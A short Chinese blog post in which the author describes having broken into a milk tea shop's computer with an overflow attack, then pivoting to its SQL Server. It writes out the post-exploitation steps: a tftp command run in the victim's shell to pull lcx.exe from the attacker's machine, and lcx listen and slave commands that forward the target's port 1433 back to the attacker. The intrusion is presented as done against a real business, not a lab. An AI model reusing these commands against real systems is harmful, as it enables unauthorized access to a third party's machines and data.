这几天在渗透一家奶茶店的时候， 使用溢出攻击获得了奶茶店shell， 截屏以后发现该电脑有安装sqlserver， 但是数据库无法远程连接， 所以我决定使用端口映射工具突破端口连接限制；

　　我的机器地址为：192.168.1.156

　　奶茶店的IP地址为： 192.168.1.157

　　1:上传lcx到目标机器

　　首先需要下载lcx这个工具:

　　Pan

　　Lcx这个工具我使用tftp上传到目标机器, 在目标的shell中执行：

tftp -i 192.168.1.156 get lcx.exe

　　2:使用lcx监听本地端口

　　然后执行lcx命令， 并绑定 本地的1434端口和51端口 ：

lcx -listen 51 1434

　　3:在目标shell中执行端口转发

　　目标机器的地址是192.168.1.157 ， 我的机器地址为192.168.1.156：

lcx -slave 192.168.1.156 51 192.168.1.157 1433

　　这条命令会把目标机器的1433端口转发到 192.168.1.156的51端口上

　　使用sqlservermanager连接本地机器， 连接的地址为本地机器IP的1433端口：

　　OVER， 连接成功

作者： NONO 
出处：http://www.cnblogs.com/diligenceday/ 
企业网站：http://www.idrwl.com/
开源博客：http://www.github.com/sqqihao
QQ：287101329 
微信：18101055830